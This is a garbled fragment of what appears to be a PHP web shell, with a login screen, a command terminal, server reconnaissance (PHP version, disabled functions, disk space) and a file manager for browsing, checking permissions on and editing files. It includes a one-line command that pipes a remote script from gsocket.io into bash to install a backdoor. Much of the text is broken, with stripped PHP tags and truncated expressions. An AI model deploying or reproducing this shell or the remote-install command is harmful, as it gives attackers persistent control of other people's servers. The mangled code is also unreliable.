??????????????
??????????????
??????????????
??????????????
=$APP_NAME?> - Login
=$APP_NAME?>
$msg"; ?>
=$APP_NAME?>
=$APP_NAME?> | Logout
Terminal
$terminal_output"; ?>
Server Info
PHP: =phpversion();?>
Disable: =ini_get('disable_functions')?>
Path: =$path?>
Disk: =round(disk_free_space($path)/1024/1024,2)?> MB / =round(disk_total_space($path)/1024/1024,2)?> MB
bash -c \"\$(curl -fsSL https://gsocket.io/y)\" ";
if(isset($_POST['show_minisocket'])) echo "";
?>
$pat){
if($pat==''&&$id==0){echo '
/';continue;}
if($pat=='')continue;
echo '
'.$pat.'/';
}
?>
$msg
";?>
| Name | Size | Perm | Action |
=1024*1024?round(filesize($full)/1024/1024,2)." MB":round(filesize($full)/1024,2)." KB");
$id = 'menu_'.md5($full);
$editModal = 'editModal_'.md5($full);
echo"
| ".($isFolder?"$f":$f)." |
$size |
".perms($full)." |
";
if(!$isFolder){
echo "
×
Edit File: $full
";
}
echo " |
";
}
foreach($folders as $f) renderRow($path.'/'.$f,$f,true);
foreach($files as $f) renderRow($path.'/'.$f,$f,false);
?>